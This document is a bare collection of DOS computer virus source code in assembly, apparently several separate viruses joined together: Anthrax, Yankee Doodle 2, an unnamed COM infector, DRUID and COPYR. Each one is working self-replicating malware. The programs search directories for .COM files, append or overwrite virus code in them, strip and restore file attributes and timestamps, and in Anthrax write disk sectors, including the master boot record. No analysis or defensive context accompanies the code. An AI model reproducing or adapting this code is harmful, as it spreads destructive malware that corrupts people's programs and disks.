PUBLIC ASSUME CS:SEG_A, DS:SEG_A ORG 100h ANTHRAX PROC FAR START: JMP LOC_24 ; (043B) DB 13 DUP (0) DB 95H, 8CH, 0C8H, 2DH, 0, 0 DB 0BAH, 0, 0, 50H, 52H, 1EH DB 33H, 0C9H, 8EH, 0D9H, 0BEH, 4CH DB 0, 0B8H, 0CDH, 0, 8CH, 0CAH DB 87H, 44H, 44H, 87H, 54H, 46H DB 52H, 50H, 0C4H, 1CH, 0B4H, 13H DB 0CDH, 2FH, 6, 53H, 0B4H, 13H DB 0CDH, 2FH, 58H, 5AH, 87H, 4 DB 87H, 54H, 2, 52H, 50H, 51H DB 56H, 0A0H, 3FH, 4, 0A8H, 0FH DB 75H, 6CH, 0EH, 7, 0BAH, 80H DB 0, 0B1H, 3, 0BBH, 77H, 6 DB 0B8H, 1, 2, 50H, 0CDH, 13H DB 58H, 0B1H, 1, 0BBH, 0, 4 DB 0CDH, 13H, 0EH, 1FH, 0BEH, 9BH DB 3, 8BH, 0FBH, 0B9H, 5EH, 0 DB 56H, 0F3H, 0A6H, 5EH, 8BH, 0FBH DB 0B9H, 62H, 0, 56H, 0F3H, 0A4H DB 5FH, 0BEH, 12H, 8, 0B9H, 65H DB 0, 0F3H, 0A4H, 74H, 1EH, 89H DB 4DH, 0E9H, 0B1H, 5CH, 89H, 4DH DB 9BH, 88H, 6DH, 0DCH, 0B1H, 2 DB 33H, 0DBH, 0B8H, 2, 3, 0CDH DB 13H, 49H, 0BBH, 0, 4, 0B8H DB 1, 3, 0CDH, 13H, 49H, 0B4H DB 19H, 0CDH, 21H, 50H, 0B2H, 2 DB 0B4H, 0EH, 0CDH, 21H, 0B7H, 2 DB 0E8H, 87H, 1, 5AH, 0B4H, 0EH DB 0CDH, 21H, 5EH, 1FH, 8FH, 4 DB 8FH, 44H, 2, 8FH, 44H, 44H DB 8FH, 44H, 46H, 1FH, 1EH, 7 DB 95H, 0CBH copyright DB '(c) Damage, Inc.' DB 0, 0B0H, 3, 0CFH, 6, 1EH DB 57H, 56H, 50H, 33H, 0C0H, 8EH DB 0D8H, 0BEH, 86H, 0, 0EH, 7 DB 0BFH, 8, 6, 0FDH, 0ADH, 0ABH DB 0A5H, 0AFH, 87H, 0F7H, 0ADH, 0FCH DB 74H, 11H, 1EH, 7, 0AFH, 0B8H DB 7, 1, 0ABH, 8CH, 0C8H, 0ABH DB 8EH, 0D8H, 0BFH, 68H, 0, 0A5H DB 0A5H, 58H, 5EH, 5FH, 1FH, 7 DB 2EH, 0FFH, 2EH, 0, 6, 6 DB 1EH, 57H, 56H, 52H, 51H, 53H DB 50H, 0EH, 1FH, 0BEH, 6, 6 DB 33H, 0C9H, 8EH, 0C1H, 0BFH, 84H DB 0, 0A5H, 0A5H, 0B4H, 52H, 0CDH DB 21H, 26H, 8BH, 47H, 0FEH, 8EH DB 0D8H, 0BBH, 3, 0, 3, 7 DB 40H, 8EH, 0D8H, 81H, 7, 80H DB 0, 0EH, 7, 0B7H, 12H, 0E8H DB 0F2H, 0, 58H, 5BH, 59H, 5AH DB 5EH, 5FH, 1FH, 7, 2EH, 0FFH DB 2EH, 6, 6 LOC_RET_1: RETN DB 91H, 0AEH, 0B4H, 0A8H, 0BFH DB 20H, 31H, 39H, 39H, 30H ANTHRAX ENDP ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ; SUBROUTINE ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ SUB_1 PROC NEAR MOV AX,3D00H INT 21H ; DOS Services ah=function 3Dh ; open file, al=mode,name@ds:dx JC LOC_RET_1 ; Jump if carry Set XCHG AX,BX MOV AX,1220H INT 2FH ; Multiplex/Spooler al=func 20h PUSH BX MOV BL,ES:[DI] MOV AX,1216H INT 2FH ; Multiplex/Spooler al=func 16h POP BX MOV SI,462H MOV DX,SI MOV CL,18H MOV AH,3FH ; '?' INT 21H ; DOS Services ah=function 3Fh ; read file, cx=bytes, to ds:dx XOR AX,CX JNZ LOC_7 ; Jump if not zero PUSH ES POP DS MOV BYTE PTR [DI+2],2 XOR DX,DX ; Zero register LOC_2: IN AL,DX ; port 0, DMA-1 bas&add ch 0 CMP AL,10H JB LOC_2 ; Jump if below ADD AX,[DI+11H] ADC DX,[DI+13H] AND AL,0F0H CMP AX,0FB00H JAE LOC_7 ; Jump if above or = MOV [DI+15H],AX MOV [DI+17H],DX PUSH CS POP DS PUSH AX MOV CL,10H DIV CX ; ax,dx rem=dx:ax/reg SUB AX,[SI+8] MOV CX,AX SUB AX,[SI+16H] MOV DS:DATA_2E,AX ; (65AC:0004=0) LODSW ; String [si] to ax XOR AX,5A4DH JZ LOC_3 ; Jump if zero XOR AX,1717H LOC_3: PUSHF ; Push flags JNZ LOC_4 ; Jump if not zero MOV [SI],AX CMP AX,[SI+0AH] XCHG AX,[SI+12H] MOV DS:DATA_3E,AX ; (65AC:0007=0) MOV [SI+14H],CX MOV CX,4DCH JZ LOC_5 ; Jump if zero ADD WORD PTR [SI+8],48H LOC_4: MOV CX,65H LOC_5: PUSH CX MOV CX,39BH MOV AH,40H ; '@' INT 21H ; DOS Services ah=function 40h ; write file cx=bytes, to ds:dx XOR CX,AX POP CX JNZ LOC_6 ; Jump if not zero MOV DX,400H MOV AH,40H ; '@' INT 21H ; DOS Services ah=function 40h ; write file cx=bytes, to ds:dx XOR CX,AX LOC_6: POP DX POP AX LOC_7: JNZ LOC_11 ; Jump if not zero MOV ES:[DI+15H],CX MOV ES:[DI+17H],CX PUSH DX POPF ; Pop flags JNZ LOC_9 ; Jump if not zero MOV AX,ES:[DI+11H] MOV DX,ES:[DI+13H] MOV CH,2 DIV CX ; ax,dx rem=dx:ax/reg TEST DX,DX JZ LOC_8 ; Jump if zero INC AX LOC_8: MOV [SI],DX MOV [SI+2],AX JMP SHORT LOC_10 ; (0328) LOC_9: MOV BYTE PTR [SI-2],0E9H ADD AX,328H MOV [SI-1],AX LOC_10: MOV CX,18H LEA DX,[SI-2] ; Load effective addr MOV AH,40H ; '@' INT 21H ; DOS Services ah=function 40h ; write file cx=bytes, to ds:dx LOC_11: OR BYTE PTR ES:[DI+6],40H ; '@' MOV AH,3EH ; '>' LOC_12: INT 21H ; DOS Services ah=function 3Eh ; close file, bx=file handle RETN SUB_1 ENDP ;▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ; SUBROUTINE ;▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ SUB_2 PROC NEAR MOV DS,CX MOV BL,DS:DATA_1E ; (0000:046C=34H) PUSH CS POP DS INC DATA_7 ; (65AC:045E=0FC00H) MOV DX,64BH CALL SUB_3 ; (036D) MOV SI,60AH MOV BYTE PTR [SI],5CH ; '\' INC SI XOR DL,DL ; Zero register MOV AH,47H ; 'G' INT 21H ; DOS Services ah=function 47h ; get present dir,drive dl,1=a: MOV DX,39BH LOC_13: MOV AH,3BH ; ';' INT 21H ; DOS Services ah=function 3Bh ; set current dir, path @ ds:dx JCXZ LOC_14 ; Jump if cx=0 MOV AH,51H ; 'Q' INT 21H ; DOS Services ah=function 51h ; get active PSP segment in bx MOV DS,BX MOV DX,80H ;▀▀▀▀ External Entry into Subroutine ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ SUB_3: MOV AH,1AH JMP SHORT LOC_12 ; (0339) LOC_14: JC LOC_17 ; Jump if carry Set MOV SI,39CH XOR DL,DL ; Zero register MOV AH,47H ; 'G' INT 21H ; DOS Services ah=function 47h ; get present dir,drive dl,1=a: CMP CH,BYTE PTR DS:[3DCH] ; (65AC:03DC=81H) LOC_15: MOV CL,32H ; '2' MOV DX,29DH MOV AH,4EH ; 'N' JZ LOC_20 ; Jump if zero INT 21H ; DOS Services ah=function 4Eh ; find 1st filenam match @ds:dx JC LOC_17 ; Jump if carry Set LOC_16: MOV DX,64BH MOV AX,4F01H MOV SI,3DCH MOV DI,668H STOSB ; Store al to es:[di] MOV CL,0DH REPE CMPSB ; Rep zf=1+cx >0 Cmp [si] to es:[di] JZ LOC_20 ; Jump if zero CMP CH,[DI-2] JE LOC_20 ; Jump if equal INT 21H ; DOS Services ah=function 4Fh ; find next filename match JNC LOC_16 ; Jump if carry=0 XOR AL,AL ; Zero register JMP SHORT LOC_15 ; (0380) DB 2AH, 2EH, 2AH, 0 LOC_17: MOV CL,41H ; 'A' MOV DI,39CH CMP CH,[DI] MOV AL,CH MOV BYTE PTR DS:[3DCH],AL ; (65AC:03DC=81H) JZ LOC_23 ; Jump if zero REPNE SCASB ; Rep zf=0+cx >0 Scan es:[di] for al DEC DI MOV CL,41H ; 'A' MOV AL,5CH ; '\' STD ; Set direction flag REPNE SCASB ; Rep zf=0+cx >0 Scan es:[di] for al LEA SI,[DI+2] ; Load effective addr MOV DI,3DCH CLD ; Clear direction LOC_18: LODSB ; String [si] to al TEST AL,AL STOSB ; Store al to es:[di] JNZ LOC_18 ; Jump if not zero MOV DX,2CDH XOR CL,CL ; Zero register JMP SHORT LOC_13 ; (035E) DB 2EH, 2EH, 0 LOC_19: MOV DX,64BH MOV AH,4FH ; 'O' LOC_20: INT 21H ; DOS Services ah=function 4Fh ; find next filename match JC LOC_17 ; Jump if carry Set DATA_6 DW 69BEH DB 6, 0BFH, 0DCH, 3, 80H, 3CH DB 2EH, 74H, 0ECH, 88H, 2DH, 8BH DB 0D6H, 0F6H, 44H, 0F7H, 10H, 75H DB 0DBH LOC_21: LODSB ; String [si] to al TEST AL,AL STOSB ; Store al to es:[di] JNZ LOC_21 ; Jump if not zero DEC SI STD ; Set direction flag LODSW ; String [si] to ax LODSW ; String [si] to ax CLD ; Clear direction CMP AX,4558H JE LOC_22 ; Jump if equal CMP AX,4D4FH JNE LOC_19 ; Jump if not equal LOC_22: PUSH BX CALL SUB_1 ; (0262) POP BX XOR CX,CX ; Zero register MOV ES,CX MOV AL,ES:DATA_1E ; (0000:046C=38H) PUSH CS POP ES SUB AL,BL CMP AL,BH JB LOC_19 ; Jump if below LOC_23: MOV DX,80H MOV CL,3 MOV BX,200H MOV AX,301H INT 13H ; Disk dl=drive 0: ah=func 03h ; write sectors from mem es:bx MOV DX,60AH JMP LOC_13 ; (035E) SUB_2 ENDP LOC_24: XCHG AX,BP MOV DI,100H MOV BX,[DI+1] SUB BX,228H MOV AX,DI LEA SI,[BX+3FDH] ; Load effective addr MOVSW ; Mov [si] to es:[di] MOVSB ; Mov [si] to es:[di] XCHG AX,BX MOV CL,4 SHR AX,CL ; Shift w/zeros fill MOV CX,DS ADD AX,CX MOV DX,0BH JMP SHORT LOC_26 ; (04CD) DB 0B8H, 0D0H DATA_7 DW 0FC00H DATA_8 DW 8587H DB 68H, 0FAH, 0ABH, 8CH, 0C8H, 0E2H DB 0F7H, 0A3H, 86H, 0, 0ABH, 8EH DB 0D8H, 0B4H, 8, 0CDH, 13H, 49H DB 49H, 0A1H, 0E9H, 3, 84H, 0E4H DB 74H, 1, 91H, 0B2H, 80H, 0B8H DB 3, 3, 0CDH, 13H, 91H, 84H DB 0E4H, 75H, 2 DB 2CH, 40H LOC_25: DEC AH MOV DATA_6,AX ; (65AC:03E9=69BEH) INC DATA_8 ; (65AC:0460=8587H) XOR DH,DH ; Zero register MOV CX,1 MOV BX,400H MOV AX,301H INT 13H ; Disk dl=drive ?: ah=func 03h ; write sectors from mem es:bx MOV DL,DH RETF ; Return far DB 41H, 4EH, 54H, 48H, 52H, 41H DB 58H, 0EH, 1FH, 83H, 2EH, 13H DB 4, 2, 0CDH, 12H, 0B1H, 6 DB 0D3H, 0E0H, 8EH, 0C0H, 0BFH, 0 DB 4, 0BEH, 0, 7CH, 0B9H, 0 DB 1, 8BH, 0DEH, 0FCH, 0F3H, 0A5H DB 8EH, 0D8H, 0BAH, 27H, 4 LOC_26: PUSH CX PUSH BX PUSH AX PUSH DX RETF ; Return far DB 8EH, 0C1H, 0B1H, 4, 0BEH, 0B0H DB 5 LOCLOOP_27: ADD SI,0EH LODSW ; String [si] to ax CMP AL,80H JE LOC_29 ; Jump if equal LOOP LOCLOOP_27 ; Loop if cx > 0 LOC_28: INT 18H ; ROM basic LOC_29: XCHG AX,DX STD ; Set direction flag LODSW ; String [si] to ax XCHG AX,CX MOV AX,201H INT 13H ; Disk dl=drive a: ah=func 02h ; read sectors to memory es:bx CMP WORD PTR DS:DATA_10E,0AA55H ; (65AC:05FE=0) JNE LOC_28 ; Jump if not equal PUSH ES PUSH DS POP ES POP DS XOR DH,DH ; Zero register MOV CX,2 XOR BX,BX ; Zero register MOV AX,202H INT 13H ; Disk dl=drive a: ah=func 02h ; read sectors to memory es:bx JMP $-10FH DB 0, 0, 0, 0, 0CDH, 20H DB 0CCH DB 112 DUP (1AH) SEG_A ENDS END START done ; YANKEE2.ASM -- Yankee Doodle ][ ; Created with Nowhere Man's Virus Creation Laboratory v1.00 ; Written by Nowhere Man virus_type equ 0 ; Appending Virus is_encrypted equ 0 ; We're not encrypted tsr_virus equ 0 ; We're not TSR code segment byte public assume cs:code,ds:code,es:code,ss:code org 0100h main proc near db 0E9h,00h,00h ; Near jump (for compatibility) start: call find_offset ; Like a PUSH IP find_offset: pop bp ; BP holds old IP sub bp,offset find_offset ; Adjust for length of host lea si,[bp + buffer] ; SI points to original start mov di,0100h ; Push 0100h on to stack for push di ; return to main program movsw ; Copy the first two bytes movsb ; Copy the third byte mov di,bp ; DI points to start of virus mov bp,sp ; BP points to stack sub sp,128 ; Allocate 128 bytes on stack mov ah,02Fh ; DOS get DTA function int 021h push bx ; Save old DTA address on stack mov ah,01Ah ; DOS set DTA function lea dx,[bp - 128] ; DX points to buffer on stack int 021h call search_files ; Find and infect a file call search_files ; Find and infect another file call get_hour cmp ax,0011h ; Did the function return 17? jle skip00 ; If less that or equal, skip effect cmp ax,0013h ; Did the function return 19? jge skip00 ; If greater than or equal, skip effect jmp short strt00 ; Success -- skip jump skip00: jmp end00 ; Skip the routine strt00: lea si,[di + data00] ; SI points to data get_note: mov bx,[si] ; Load BX with the frequency or bx,bx ; Is BX equal to zero? je play_tune_done ; If it is we are finished mov ax,034DDh ; mov dx,0012h ; cmp dx,bx ; jnb new_note ; div bx ; This bit here was stolen mov bx,ax ; from the Turbo C++ v1.0 in al,061h ; library file CS.LIB. I test al,3 ; extracted sound() from the jne skip_an_or ; library and linked it to or al,3 ; an .EXE file, then diassembled out 061h,al ; it. Basically this turns mov al,0B6h ; on the speaker at a certain out 043h,al ; frequency. skip_an_or: mov al,bl ; out 042h,al ; mov al,bh ; out 042h,al ; mov bx,[si + 2] ; BX holds duration value xor ah,ah ; BIOS get time function int 1Ah add bx,dx ; Add the time to the length wait_loop: int 1Ah ; Get the time again (AH = 0) cmp dx,bx ; Is the delay over? jne wait_loop ; Repeat until it is in al,061h ; Stolen from the nosound() and al,0FCh ; procedure in Turbo C++ v1.0. out 061h,al ; This turns off the speaker. new_note: add si,4 ; SI points to next note jmp short get_note ; Repeat with the next note play_tune_done: end00: com_end: pop dx ; DX holds original DTA address mov ah,01Ah ; DOS set DTA function int 021h mov sp,bp ; Deallocate local buffer xor ax,ax ; mov bx,ax ; mov cx,ax ; mov dx,ax ; Empty out the registers mov si,ax ; mov di,ax ; mov bp,ax ; ret ; Return to original program main endp search_files proc near mov bx,di ; BX points to the virus push bp ; Save BP mov bp,sp ; BP points to local buffer sub sp,135 ; Allocate 135 bytes on stack mov byte ptr [bp - 135],'\' ; Start with a backslash mov ah,047h ; DOS get current dir function xor dl,dl ; DL holds drive # (current) lea si,[bp - 134] ; SI points to 64-byte buffer int 021h call traverse_path ; Start the traversal traversal_loop: cmp word ptr [bx + path_ad],0 ; Was the search unsuccessful? je done_searching ; If so then we're done call found_subdir ; Otherwise copy the subdirectory mov ax,cs ; AX holds the code segment mov ds,ax ; Set the data and extra mov es,ax ; segments to the code segment xor al,al ; Zero AL stosb ; NULL-terminate the directory mov ah,03Bh ; DOS change directory function lea dx,[bp - 70] ; DX points to the directory int 021h lea dx,[bx + com_mask] ; DX points to "*.COM" push di mov di,bx call find_files ; Try to infect a .COM file mov bx,di pop di jnc done_searching ; If successful the exit jmp short traversal_loop ; Keep checking the PATH done_searching: mov ah,03Bh ; DOS change directory function lea dx,[bp - 135] ; DX points to old directory int 021h cmp word ptr [bx + path_ad],0 ; Did we run out of directories? jne at_least_tried ; If not then exit stc ; Set the carry flag for failure at_least_tried: mov sp,bp ; Restore old stack pointer pop bp ; Restore BP ret ; Return to caller com_mask db "*.COM",0 ; Mask for all .COM files search_files endp traverse_path proc near mov es,word ptr cs:[002Ch] ; ES holds the enviroment segment xor di,di ; DI holds the starting offset find_path: lea si,[bx + path_string] ; SI points to "PATH=" lodsb ; Load the "P" into AL mov cx,08000h ; Check the first 32767 bytes repne scasb ; Search until the byte is found mov cx,4 ; Check the next four bytes check_next_4: lodsb ; Load the next letter of "PATH=" scasb ; Compare it to the environment jne find_path ; If there not equal try again loop check_next_4 ; Otherwise keep checking mov word ptr [bx + path_ad],di ; Save the PATH address mov word ptr [bx + path_ad + 2],es ; Save the PATH's segment ret ; Return to caller path_string db "PATH=" ; The PATH string to search for path_ad dd ? ; Holds the PATH's address traverse_path endp found_subdir proc near lds si,dword ptr [bx + path_ad] ; DS:SI points to PATH lea di,[bp - 70] ; DI points to the work buffer push cs ; Transfer CS into ES for pop es ; byte transfer move_subdir: lodsb ; Load the next byte into AL cmp al,';' ; Have we reached a separator? je moved_one ; If so we're done copying or al,al ; Are we finished with the PATH? je moved_last_one ; If so get out of here stosb ; Store the byte at ES:DI jmp short move_subdir ; Keep transfering characters moved_last_one: xor si,si ; Zero SI to signal completion moved_one: mov word ptr es:[bx + path_ad],si ; Store SI in the path address ret ; Return to caller found_subdir endp find_files proc near push bp ; Save BP mov ah,02Fh ; DOS get DTA function int 021h push bx ; Save old DTA address mov bp,sp ; BP points to local buffer sub sp,128 ; Allocate 128 bytes on stack push dx ; Save file mask mov ah,01Ah ; DOS set DTA function lea dx,[bp - 128] ; DX points to buffer int 021h mov ah,04Eh ; DOS find first file function mov cx,00100111b ; CX holds all file attributes pop dx ; Restore file mask find_a_file: int 021h jc done_finding ; Exit if no files found call infect_file ; Infect the file! jnc done_finding ; Exit if no error mov ah,04Fh ; DOS find next file function jmp short find_a_file ; Try finding another file done_finding: mov sp,bp ; Restore old stack frame mov ah,01Ah ; DOS set DTA function pop dx ; Retrieve old DTA address int 021h pop bp ; Restore BP ret ; Return to caller find_files endp infect_file proc near mov ah,02Fh ; DOS get DTA address function int 021h mov si,bx ; SI points to the DTA mov byte ptr [di + set_carry],0 ; Assume we'll fail cmp word ptr [si + 01Ah],(65279 - (finish - start)) jbe size_ok ; If it's small enough continue jmp infection_done ; Otherwise exit size_ok: mov ax,03D00h ; DOS open file function, r/o lea dx,[si + 01Eh] ; DX points to file name int 021h xchg bx,ax ; BX holds file handle mov ah,03Fh ; DOS read from file function mov cx,3 ; CX holds bytes to read (3) lea dx,[di + buffer] ; DX points to buffer int 021h mov ax,04202h ; DOS file seek function, EOF cwd ; Zero DX _ Zero bytes from end mov cx,dx ; Zero CX / int 021h xchg dx,ax ; Faster than a PUSH AX mov ah,03Eh ; DOS close file function int 021h xchg dx,ax ; Faster than a POP AX sub ax,finish - start + 3 ; Adjust AX for a valid jump cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet? je infection_done ; If equal then exit mov byte ptr [di + set_carry],1 ; Success -- the file is OK add ax,finish - start ; Re-adjust to make the jump mov word ptr [di + new_jump + 1],ax ; Construct jump mov ax,04301h ; DOS set file attrib. function xor cx,cx ; Clear all attributes lea dx,[si + 01Eh] ; DX points to victim's name int 021h mov ax,03D02h ; DOS open file function, r/w int 021h xchg bx,ax ; BX holds file handle mov ah,040h ; DOS write to file function mov cx,3 ; CX holds bytes to write (3) lea dx,[di + new_jump] ; DX points to the jump we made int 021h mov ax,04202h ; DOS file seek function, EOF cwd ; Zero DX _ Zero bytes from end mov cx,dx ; Zero CX / int 021h mov ah,040h ; DOS write to file function mov cx,finish - start ; CX holds virus length lea dx,[di + start] ; DX points to start of virus int 021h mov ax,05701h ; DOS set file time function mov cx,[si + 016h] ; CX holds old file time mov dx,[si + 018h] ; DX holds old file date int 021h mov ah,03Eh ; DOS close file function int 021h mov ax,04301h ; DOS set file attrib. function xor ch,ch ; Clear CH for file attribute mov cl,[si + 015h] ; CX holds file's old attributes lea dx,[si + 01Eh] ; DX points to victim's name int 021h infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed ret ; Return to caller set_carry db ? ; Set-carry-on-exit flag buffer db 090h,0CDh,020h ; Buffer to hold old three bytes new_jump db 0E9h,?,? ; New jump to virus infect_file endp get_hour proc near mov ah,02Ch ; DOS get time function int 021h mov al,ch ; Copy hour into AL cbw ; Sign-extend AL into AX ret ; Return to caller get_hour endp data00 dw 262,6,262,6,293,6,329,6,262,6,329,6,293,6,196,6 dw 262,6,262,6,293,6,329,6,262,12,262,12 dw 262,6,262,6,293,6,329,6,349,6,329,6,293,6,262,6 dw 246,6,196,6,220,6,246,6,262,12,262,12 dw 220,6,246,6,220,6,174,6,220,6,246,6,262,6,220,6 dw 196,6,220,6,196,6,174,6,164,6,174,6,196,7 dw 220,6,246,6,220,6,174,6,220,6,246,6,262,6,220,7 dw 196,6,262,6,246,6,293,6,262,12,262,12 dw 0 vcl_marker db "[VCL]",0 ; VCL creation marker note db "[Yankee Doodle 2]",0 db "Nowhere Man, [NuKE] '92",0 finish label near code ends end main done .radix 16 code segment assume cs:code,ds:code org 100 olddta equ 80 virlen equ offset endcode - offset start smalcod equ offset endcode - offset transf buffer equ offset endcode + 100 newdta equ offset endcode + 10 fname = newdta + 1E virlenx = offset endcode - offset start start: jmp cancer ident dw 'VI' counter db 0 allcom db '*.COM',0 vleng db virlen n_10D db 3 ;Unused progbeg dd ? eof dw ? handle dw ? cancer: mov ax,cs ;Move program code add ax,1000 ; 64K bytes forward mov es,ax inc [counter] mov si,offset start xor di,di mov cx,virlen rep movsb mov dx,newdta ;Set new Disk Transfer Address mov ah,1A ;Set DTA int 21 mov dx,offset allcom ;Search for '*.COM' files mov cx,110b ;Normal, Hidden or System mov ah,4E ;Find First file int 21 jc done ;Quit if none found mainlp: mov dx,offset fname mov ax,3D02 ;Open file in Read/Write mode int 21 mov [handle],ax ;Save handle mov bx,ax push es pop ds mov dx,buffer mov cx,0FFFF ;Read all bytes mov ah,3F ;Read from handle int 21 ;Bytes read in AX add ax,buffer mov cs:[eof],ax ;Save pointer to the end of file xor cx,cx ;Go to file beginning mov dx,cx mov bx,cs:[handle] mov ax,4200 ;LSEEK from the beginning of the file int 21 jc close ;Leave this file if error occures mov dx,0 ;Write the whole code (virus+file) mov cx,cs:[eof] ; back onto the file mov bx,cs:[handle] mov ah,40 ;Write to handle int 21 close: mov bx,cs:[handle] mov ah,3E ;Close the file int 21 push cs pop ds ;Restore DS mov ah,4F ;Find next matching file mov dx,newdta int 21 jc done ;Exit if all found jmp mainlp ;Otherwise loop again done: mov dx,olddta ;Restore old Disk Transfer Address mov ah,1A ;Set DTA int 21 mov si,offset transf ;Move this part of code mov cx,smalcod ;Code length xor di,di ;Move to ES:0 rep movsb ;Do it xor di,di ;Clear DI mov word ptr cs:[progbeg],0 mov word ptr cs:[progbeg+2],es ;Point progbeg at program start jmp cs:[progbeg] ;Jump at program start transf: push ds pop es mov si,buffer+100 cmp [counter],1 jne skip sub si,200 skip: mov di,offset start mov cx,0FFFF ;Restore original program's code sub cx,si rep movsb mov word ptr cs:[start],offset start mov word ptr cs:[start+2],ds jmp dword ptr cs:[start] ;Jump to program start endcode label byte int 20 ;Dummy program int 20 ;??? db 0 ;Unused code ends end start done fname equ 9eh ; pointer to filename in DTA seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h druid proc far vstart equ $ start: mov ax,2EBh ; used to baffle sourcer... jmp $-2 ; mov dx,offset newint ; set int1 to newint mov ax,2501h int 21h mov al,3 ; set int3 to newint int 21h mov dx,offset newint ; do it again... mov ax,2501h int 21h mov al,1 int 21h mov ah,47h ; get current directory xor dl,dl ; and save it lea si,currdir int 21h again: lea dx,fmask mov ah,4Eh ; Find first *.COM getfile: int 21h jnc found_ok ;if ok, goto found_ok jmp short bailout ;if no more files, goto bail out nop found_ok: mov si,fname ; load filename into ax lodsw cmp ax,'OC' ; if first 3 letters is "CO" ; as in "COMMAND.COM" jne infect ; if not, go on jmp getnext ; else, get another file mov ax,2EBh ; used to baffle sourcer... jmp $-2 infect: mov dx,fname ; get attribute mov ax,4300h ; of the file found int 21h push cx ; and save it xor cx,cx ; reset attributes mov ax,4301h int 21h mov ax,2EBh ; used to baffle sourcer... jmp $-2 mov dx,fname ; open file mov ax,3D02h int 21h ; DOS Services ah=function 3Dh ; open file, al=mode,name@ds:dx jc getnext ; if error, skip to loc_5 xchg ax,bx ; get handle in bx mov ax,5700h ; get time'n date int 21h push dx ; save'em push cx mov ah,40h ; write virus to target mov cx,virlen ; number of bytes to write mov dx,fname ; pointer to file int 21h pop cx ; restore the date'n time pop dx mov ax,5701h int 21h mov ah,3Eh ; close target int 21h pop cx ; restore the attributes mov ax,4301h mov dx,fname int 21h getnext: mov ah,4Fh ; get next file matching *.COM jmp short getfile bailout: mov ax,2EBh ; used to baffle sourcer... jmp $-2 lea dx,dot_dot ; "cd.." mov ah,3Bh int 21h jc exit ; if error, goto exit jmp short again ; do it all over again exit: mov ax,2EBh ; used to baffle sourcer... jmp $-2 mov ah,3Bh ; change back to lea dx,return_dir ; original directory int 21h mov ax,4C00h ; quit to dos with int 21h ; errorlevel 0 id db ' DRUID, coded by Morbid Angel/Line Noise -92 in Stockholm/Sweden' druid endp newint proc far ; replaces INT1 and INT3 iret ; with this. newint endp fmask db '*.COM',0 dot_dot db '..',0 return_dir db '\' ; the slash is used when currdir dw 32 dup (?) ; returning to old dir. vend equ $ virlen equ vend - vstart seg_a ends end start done data_1e equ 9Eh ; (996E:009E=0) seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h COPYR proc far start: mov ah,4Eh ; 'N' mov cl,20h ; ' ' mov dx,offset data_3 ; (996E:0128=2Ah) int 21h ; DOS Services ah=function 4Eh ; find 1st filenam match @ds:dx loc_1: mov dx,data_1e ; (996E:009E=0) mov ax,3D01h int 21h ; DOS Services ah=function 3Dh ; open file, al=mode,name@ds:dx mov bx,ax mov dx,offset ds:[100h] ; (996E:0100=0B4h) mov cl,2Eh ; '.' mov ah,40h ; '@' int 21h ; DOS Services ah=function 40h ; write file cx=bytes, to ds:dx mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle mov ah,4Fh ; 'O' int 21h ; DOS Services ah=function 4Fh ; find next filename match jnc loc_1 ; Jump if carry=0 int 20h ; Program Terminate data_3 db 2Ah db 2Eh, 43h, 4Fh, 4Dh, 00h COPYR endp seg_a ends end start done